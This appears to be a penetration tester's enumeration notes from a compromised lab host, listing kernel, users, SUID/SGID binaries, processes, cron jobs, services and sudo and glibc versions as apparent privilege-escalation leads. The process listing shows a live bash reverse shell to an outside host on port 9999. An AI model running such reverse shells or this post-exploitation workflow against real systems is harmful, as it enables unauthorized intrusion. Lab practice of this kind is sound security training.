System/Kernel


www-data@reconstruction:~/blog$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b636f50d85c3cca7cf2518030446660c1d90d660, stripped
Linux reconstruction 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

64-bit Ubuntu 18.04 LTS (Bionic Beaver) 4.15.0-20-generic

Networks


www-data@reconstruction:~/blog$ ip route ; arp -a
default via 192.168.209.254 dev ens160 proto static 
192.168.209.0/24 dev ens160 proto kernel scope link src 192.168.209.103 
_gateway (192.168.209.254) at 00:50:56:9e:72:00 [ether] on ens160
www-data@reconstruction:~/blog$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1116/python3.6      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 192.168.209.103:8080    192.168.45.215:34968    ESTABLISHED 1177/python3.6      
tcp        0    141 192.168.209.103:40512   192.168.45.215:9999     ESTABLISHED 1456/bash           
udp    16128      0 127.0.0.53:53           0.0.0.0:*                           -                   

Users & Groups


www-data@reconstruction:~/blog$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jack:x:1001:1001::/home/jack:/bin/bash
netplan:x:63434:63434:netplan daemon user,,,:/var/lib/plan/netplan.dir:/usr/sbin/nologin
total 12K
4.0K drwxr-xr-x  3 root root 4.0K Sep 30  2020 .
4.0K drwxr-xr-x  3 root root 4.0K Sep 30  2020 jack
4.0K drwxr-xr-x 23 root root 4.0K Sep 30  2020 ..

jack

www-data@reconstruction:~/blog$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(ftp) gid=115(ftp) groups=115(ftp)
uid=1001(jack) gid=1001(jack) groups=1001(jack)
uid=63434(netplan) gid=63434(netplan) groups=63434(netplan)

uid=1001(jack) gid=1001(jack) groups=1001(jack)

SUIDs


www-data@reconstruction:~/blog$ find / -perm -04000 -ls -type f 2>/dev/null
       56     43 -rwsr-xr-x   1 root     root        43088 Sep 16  2020 /snap/core18/1932/bin/mount
       65     63 -rwsr-xr-x   1 root     root        64424 Jun 28  2019 /snap/core18/1932/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44664 Mar 22  2019 /snap/core18/1932/bin/su
       99     27 -rwsr-xr-x   1 root     root        26696 Sep 16  2020 /snap/core18/1932/bin/umount
     1704     75 -rwsr-xr-x   1 root     root        76496 Mar 22  2019 /snap/core18/1932/usr/bin/chfn
     1706     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /snap/core18/1932/usr/bin/chsh
     1759     75 -rwsr-xr-x   1 root     root        75824 Mar 22  2019 /snap/core18/1932/usr/bin/gpasswd
     1823     40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /snap/core18/1932/usr/bin/newgrp
     1836     59 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /snap/core18/1932/usr/bin/passwd
     1927    146 -rwsr-xr-x   1 root     root       149080 Jan 31  2020 /snap/core18/1932/usr/bin/sudo
     2014     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2324    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
       56     43 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /snap/core18/1885/bin/mount
       65     63 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /snap/core18/1885/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /snap/core18/1885/bin/su
       99     27 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /snap/core18/1885/bin/umount
     1698     75 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /snap/core18/1885/usr/bin/chfn
     1700     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /snap/core18/1885/usr/bin/chsh
     1752     75 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
     1816     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /snap/core18/1885/usr/bin/newgrp
     1828     59 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /snap/core18/1885/usr/bin/passwd
     1919    146 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /snap/core18/1885/usr/bin/sudo
     2006     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2314    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27  2020 /snap/core/10126/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/10126/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/10126/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/10126/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27  2020 /snap/core/10126/bin/umount
     2608     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/10126/usr/bin/chfn
     2610     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/10126/usr/bin/chsh
     2686     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/10126/usr/bin/gpasswd
     2778     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/10126/usr/bin/newgrp
     2791     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/10126/usr/bin/passwd
     2901    134 -rwsr-xr-x   1 root     root              136808 Jan 31  2020 /snap/core/10126/usr/bin/sudo
     3000     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/10126/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3370    419 -rwsr-xr-x   1 root     root              428240 May 26  2020 /snap/core/10126/usr/lib/openssh/ssh-keysign
     6432    109 -rwsr-xr-x   1 root     root              110792 Sep 29  2020 /snap/core/10126/usr/lib/snapd/snap-confine
     7610    386 -rwsr-xr--   1 root     dip               394984 Jul 23  2020 /snap/core/10126/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27  2020 /snap/core/10185/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/10185/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/10185/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/10185/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27  2020 /snap/core/10185/bin/umount
     2610     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/10185/usr/bin/chfn
     2612     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/10185/usr/bin/chsh
     2689     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/10185/usr/bin/gpasswd
     2781     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/10185/usr/bin/newgrp
     2794     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/10185/usr/bin/passwd
     2904    134 -rwsr-xr-x   1 root     root              136808 Jan 31  2020 /snap/core/10185/usr/bin/sudo
     3003     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/10185/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3375    419 -rwsr-xr-x   1 root     root              428240 May 26  2020 /snap/core/10185/usr/lib/openssh/ssh-keysign
     6437    109 -rwsr-xr-x   1 root     root              110792 Oct  8  2020 /snap/core/10185/usr/lib/snapd/snap-confine
     7615    386 -rwsr-xr--   1 root     dip               394984 Jul 23  2020 /snap/core/10185/usr/sbin/pppd
   652888     44 -rwsr-xr-x   1 root     root               44664 Jan 25  2018 /bin/su
   652905     28 -rwsr-xr-x   1 root     root               26696 Mar 15  2018 /bin/umount
   652861     44 -rwsr-xr-x   1 root     root               43088 Mar 15  2018 /bin/mount
   664875    144 -rwsr-xr-x   1 root     root              146128 Nov 30  2017 /bin/ntfs-3g
   664872     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   652870     64 -rwsr-xr-x   1 root     root               64424 Mar  9  2017 /bin/ping
   653169    148 -rwsr-xr-x   1 root     root              149080 Jan 17  2018 /usr/bin/sudo
   666833     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2018 /usr/bin/pkexec
   653078     40 -rwsr-xr-x   1 root     root               40344 Jan 25  2018 /usr/bin/newgrp
   666810     40 -rwsr-xr-x   1 root     root               37136 Jan 25  2018 /usr/bin/newuidmap
   666809     40 -rwsr-xr-x   1 root     root               37136 Jan 25  2018 /usr/bin/newgidmap
   666374     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
   666155     20 -rwsr-xr-x   1 root     root               18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   653089     60 -rwsr-xr-x   1 root     root               59640 Jan 25  2018 /usr/bin/passwd
   652956     44 -rwsr-xr-x   1 root     root               44528 Jan 25  2018 /usr/bin/chsh
   652954     76 -rwsr-xr-x   1 root     root               76496 Jan 25  2018 /usr/bin/chfn
   653019     76 -rwsr-xr-x   1 root     root               75824 Jan 25  2018 /usr/bin/gpasswd
   666212    428 -rwsr-xr-x   1 root     root              436552 Feb  9  2018 /usr/lib/openssh/ssh-keysign
   666836     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2018 /usr/lib/policykit-1/polkit-agent-helper-1
   797643     80 -rwsr-xr-x   1 root     root               80056 Apr  2  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   653280     44 -rwsr-xr--   1 root     messagebus         42992 Nov 15  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   666907    100 -rwsr-sr-x   1 root     root              101208 Apr 16  2018 /usr/lib/snapd/snap-confine
   653290     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device

   666833     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2018 /usr/bin/pkexec
   666836     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2018 /usr/lib/policykit-1/polkit-agent-helper-1

SGIDs


www-data@reconstruction:~/blog$ find / -type f -perm -02000 -ls 2>/dev/null
     1633     34 -rwxr-sr-x   1 root     shadow      34816 Jul 21  2020 /snap/core18/1932/sbin/pam_extrausers_chkpwd
     1662     34 -rwxr-sr-x   1 root     shadow      34816 Jul 21  2020 /snap/core18/1932/sbin/unix_chkpwd
     1699     71 -rwxr-sr-x   1 root     shadow      71816 Mar 22  2019 /snap/core18/1932/usr/bin/chage
     1744     23 -rwxr-sr-x   1 root     shadow      22808 Mar 22  2019 /snap/core18/1932/usr/bin/expiry
     1920    355 -rwxr-sr-x   1 root     crontab    362640 Mar  4  2019 /snap/core18/1932/usr/bin/ssh-agent
     1984     31 -rwxr-sr-x   1 root     tty         30800 Sep 16  2020 /snap/core18/1932/usr/bin/wall
     1631     34 -rwxr-sr-x   1 root     shadow      34816 Feb 27  2019 /snap/core18/1885/sbin/pam_extrausers_chkpwd
     1660     34 -rwxr-sr-x   1 root     shadow      34816 Feb 27  2019 /snap/core18/1885/sbin/unix_chkpwd
     1693     71 -rwxr-sr-x   1 root     shadow      71816 Mar 22  2019 /snap/core18/1885/usr/bin/chage
     1738     23 -rwxr-sr-x   1 root     shadow      22808 Mar 22  2019 /snap/core18/1885/usr/bin/expiry
     1912    355 -rwxr-sr-x   1 root     crontab    362640 Mar  4  2019 /snap/core18/1885/usr/bin/ssh-agent
     1976     31 -rwxr-sr-x   1 root     tty         30800 Mar  5  2020 /snap/core18/1885/usr/bin/wall
     2526     35 -rwxr-sr-x   1 root     shadow      35632 Apr  9  2018 /snap/core/10126/sbin/pam_extrausers_chkpwd
     2566     35 -rwxr-sr-x   1 root     shadow      35600 Apr  9  2018 /snap/core/10126/sbin/unix_chkpwd
     2603     61 -rwxr-sr-x   1 root     shadow      62336 Mar 25  2019 /snap/core/10126/usr/bin/chage
     2623     36 -rwxr-sr-x   1 root     systemd-network    36080 Apr  5  2016 /snap/core/10126/usr/bin/crontab
     2652     15 -rwxr-sr-x   1 root     mail               14856 Dec  6  2013 /snap/core/10126/usr/bin/dotlockfile
     2664     23 -rwxr-sr-x   1 root     shadow             22768 Mar 25  2019 /snap/core/10126/usr/bin/expiry
     2761     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10126/usr/bin/mail-lock
     2761     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10126/usr/bin/mail-touchlock
     2761     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10126/usr/bin/mail-unlock
     2894    351 -rwxr-sr-x   1 root     crontab           358624 May 26  2020 /snap/core/10126/usr/bin/ssh-agent
     2959     27 -rwxr-sr-x   1 root     tty                27368 Jan 27  2020 /snap/core/10126/usr/bin/wall
     2528     35 -rwxr-sr-x   1 root     shadow             35632 Apr  9  2018 /snap/core/10185/sbin/pam_extrausers_chkpwd
     2568     35 -rwxr-sr-x   1 root     shadow             35600 Apr  9  2018 /snap/core/10185/sbin/unix_chkpwd
     2605     61 -rwxr-sr-x   1 root     shadow             62336 Mar 25  2019 /snap/core/10185/usr/bin/chage
     2625     36 -rwxr-sr-x   1 root     systemd-network    36080 Apr  5  2016 /snap/core/10185/usr/bin/crontab
     2654     15 -rwxr-sr-x   1 root     mail               14856 Dec  6  2013 /snap/core/10185/usr/bin/dotlockfile
     2666     23 -rwxr-sr-x   1 root     shadow             22768 Mar 25  2019 /snap/core/10185/usr/bin/expiry
     2764     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10185/usr/bin/mail-lock
     2764     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10185/usr/bin/mail-touchlock
     2764     15 -rwxr-sr-x   3 root     mail               14592 Dec  3  2012 /snap/core/10185/usr/bin/mail-unlock
     2897    351 -rwxr-sr-x   1 root     crontab           358624 May 26  2020 /snap/core/10185/usr/bin/ssh-agent
     2962     27 -rwxr-sr-x   1 root     tty                27368 Jan 27  2020 /snap/core/10185/usr/bin/wall
   391763     36 -rwxr-sr-x   1 root     shadow             34816 Apr  5  2018 /sbin/unix_chkpwd
   391739     36 -rwxr-sr-x   1 root     shadow             34816 Apr  5  2018 /sbin/pam_extrausers_chkpwd
   652965     40 -rwxr-sr-x   1 root     crontab            39352 Nov 16  2017 /usr/bin/crontab
   666192     44 -rwxr-sr-x   1 root     mlocate            43088 Mar  1  2018 /usr/bin/mlocate
   653004     24 -rwxr-sr-x   1 root     shadow             22808 Jan 25  2018 /usr/bin/expiry
   652951     72 -rwxr-sr-x   1 root     shadow             71816 Jan 25  2018 /usr/bin/chage
   666374     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
   664825     16 -rwxr-sr-x   1 root     tty                14328 Jan 17  2018 /usr/bin/bsd-write
   653226     32 -rwxr-sr-x   1 root     tty                30800 Mar 15  2018 /usr/bin/wall
   666205    356 -rwxr-sr-x   1 root     ssh               362640 Feb  9  2018 /usr/bin/ssh-agent
   666407     12 -rwxr-sr-x   1 root     utmp               10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
   666907    100 -rwsr-sr-x   1 root     root              101208 Apr 16  2018 /usr/lib/snapd/snap-confine

Processes


www-data@reconstruction:~/blog$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4  77620  9012 ?        Ss   00:35   0:00 /sbin/init
root       506  0.0  0.7  94776 14328 ?        S<s  00:35   0:00 /lib/systemd/systemd-journald
root       512  0.0  0.0 105904  1952 ?        Ss   00:35   0:00 /sbin/lvmetad -f
root       521  0.1  0.3  52156  7056 ?        Ss   00:35   0:01 /lib/systemd/systemd-udevd
systemd+   566  0.0  0.1 141908  3292 ?        Ssl  00:35   0:00 /lib/systemd/systemd-timesyncd
systemd+   571  0.0  0.2  71816  5312 ?        Ss   00:35   0:00 /lib/systemd/systemd-networkd
systemd+   575  0.0  0.2  70608  5276 ?        Ss   00:35   0:00 /lib/systemd/systemd-resolved
root       624  0.0  0.0  25376   288 ?        Ss   00:35   0:00 /sbin/iscsid
root       625  0.0  0.2  25880  5260 ?        S<Ls 00:35   0:00 /sbin/iscsid
root       688  0.0  0.5  91148 10784 ?        Ss   00:35   0:00 /usr/bin/VGAuthService
root       689  0.0  0.3 227036  7540 ?        S<sl 00:35   0:00 /usr/bin/vmtoolsd
syslog     931  0.0  0.2 263036  4848 ?        Ssl  00:35   0:00 /usr/sbin/rsyslogd -n
message+   933  0.0  0.2  50056  4448 ?        Ss   00:35   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root       937  0.0  0.3 287524  7032 ?        Ssl  00:35   0:00 /usr/lib/accountsservice/accounts-daemon
root       938  0.0  0.1  31320  3192 ?        Ss   00:35   0:00 /usr/sbin/cron -f
daemon     940  0.0  0.1  28332  2420 ?        Ss   00:35   0:00 /usr/sbin/atd -f
root       945  0.0  1.4 637856 29880 ?        Ssl  00:35   0:00 /usr/lib/snapd/snapd
root       946  0.0  0.0 604916  1692 ?        Ssl  00:35   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root       960  0.0  0.3  70584  6164 ?        Ss   00:35   0:00 /lib/systemd/systemd-logind
root       968  0.0  0.1  29148  2964 ?        Ss   00:35   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root      1095  0.0  0.2  72296  5752 ?        Ss   00:35   0:00 /usr/sbin/sshd -D
root      1097  0.0  0.1  16180  2084 tty1     Ss+  00:35   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1098  0.0  0.3 288868  6712 ?        Ssl  00:35   0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data  1116  0.0  1.5  92700 30792 ?        Ss   00:35   0:00 /usr/bin/python3.6 app.py
www-data  1177  0.1  1.6 392244 32864 ?        Sl   00:35   0:01 /usr/bin/python3.6 /var/www/blog/app.py
uuidd     1189  0.0  0.0  28136  1404 ?        Ss   00:35   0:00 /usr/sbin/uuidd --socket-activation
www-data  1454  0.0  0.0   4628   884 ?        S    00:43   0:00 sh -c bash -c "bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"
www-data  1455  0.0  0.1  21340  3664 ?        S    00:43   0:00 bash -c bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data  1456  0.0  0.1  21472  3960 ?        S    00:43   0:00 bash -i
www-data  1506  0.0  0.0  16392  1084 ?        S    00:49   0:00 ping 192.168.209.254
www-data  1509  0.0  0.0   4628   772 ?        S    00:49   0:00 sh -c bash -c "bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"
www-data  1510  0.0  0.1  21340  3708 ?        S    00:49   0:00 bash -c bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data  1511  0.0  0.2  21472  4084 ?        S    00:49   0:00 bash -i
www-data  1602  0.0  0.1  39664  3692 ?        R    00:51   0:00 ps -auxwww

root       624  0.0  0.0  25376   288 ?        Ss   00:35   0:00 /sbin/iscsid
root       938  0.0  0.1  31320  3192 ?        Ss   00:35   0:00 /usr/sbin/cron -f
root       945  0.0  1.4 637856 29880 ?        Ssl  00:35   0:00 /usr/lib/snapd/snapd
root       968  0.0  0.1  29148  2964 ?        Ss   00:35   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root      1098  0.0  0.3 288868  6712 ?        Ssl  00:35   0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data  1177  0.1  1.6 392244 32864 ?        Sl   00:35   0:01 /usr/bin/python3.6 /var/www/blog/app.py

Cron & Systemd


www-data@reconstruction:~/blog$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                         LEFT          LAST                         PASSED               UNIT                         ACTIVATES
Fri 2025-02-07 01:09:42 EST  16min left    Wed 2020-09-30 12:21:58 EDT  4 years 4 months ago motd-news.timer              motd-news.service
Fri 2025-02-07 06:29:07 EST  5h 35min left Fri 2025-02-07 00:34:53 EST  18min ago            apt-daily-upgrade.timer      apt-daily-upgrade.service
Fri 2025-02-07 14:42:04 EST  13h left      Fri 2025-02-07 00:34:52 EST  18min ago            apt-daily.timer              apt-daily.service
Sat 2025-02-08 00:51:04 EST  23h left      Fri 2025-02-07 00:51:04 EST  2min 7s ago          systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2025-02-10 00:00:00 EST  2 days left   Fri 2025-02-07 00:34:50 EST  18min ago            fstrim.timer                 fstrim.service
 
5 timers listed.
Pass --all to see loaded but inactive timers, too.

Services


www-data@reconstruction:~/blog$ systemctl list-units --state=running
UNIT                              LOAD   ACTIVE SUB     DESCRIPTION                                                  
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope                        loaded active running System and Service Manager                                   
accounts-daemon.service           loaded active running Accounts Service                                             
atd.service                       loaded active running Deferred execution scheduler                                 
blog.service                      loaded active running Flask Blog                                                   
cron.service                      loaded active running Regular background program processing daemon                 
dbus.service                      loaded active running D-Bus System Message Bus                                     
getty@tty1.service                loaded active running Getty on tty1                                                
iscsid.service                    loaded active running iSCSI initiator daemon (iscsid)                              
lvm2-lvmetad.service              loaded active running LVM2 metadata daemon                                         
lxcfs.service                     loaded active running FUSE filesystem for LXC                                      
open-vm-tools.service             loaded active running Service for virtual machines hosted on VMware                
polkit.service                    loaded active running Authorization Manager                                        
rsyslog.service                   loaded active running System Logging Service                                       
snapd.service                     loaded active running Snappy daemon                                                
ssh.service                       loaded active running OpenBSD Secure Shell server                                  
systemd-journald.service          loaded active running Journal Service                                              
systemd-logind.service            loaded active running Login Service                                                
systemd-networkd.service          loaded active running Network Service                                              
systemd-resolved.service          loaded active running Network Name Resolution                                      
systemd-timesyncd.service         loaded active running Network Time Synchronization                                 
systemd-udevd.service             loaded active running udev Kernel Device Manager                                   
unattended-upgrades.service       loaded active running Unattended Upgrades Shutdown                                 
uuidd.service                     loaded active running Daemon for generating UUIDs                                  
vgauth.service                    loaded active running Authentication service for virtual machines hosted on VMware 
vsftpd.service                    loaded active running vsftpd FTP server                                            
dbus.socket                       loaded active running D-Bus System Message Bus Socket                              
lvm2-lvmetad.socket               loaded active running LVM2 metadata daemon socket                                  
snapd.socket                      loaded active running Socket activation for snappy daemon                          
syslog.socket                     loaded active running Syslog Socket                                                
systemd-journald-audit.socket     loaded active running Journal Audit Socket                                         
systemd-journald-dev-log.socket   loaded active running Journal Socket (/dev/log)                                    
systemd-journald.socket           loaded active running Journal Socket                                               
systemd-udevd-control.socket      loaded active running udev Control Socket                                          
systemd-udevd-kernel.socket       loaded active running udev Kernel Socket                                           
uuidd.socket                      loaded active running UUID daemon activation socket                                
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
36 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.

blog.service
cron.service
iscsid.service
polkit.service

Sudo Version


www-data@reconstruction:~/blog$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Sudo version 1.8.21p2

Glibc Version


www-data@reconstruction:~/blog$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27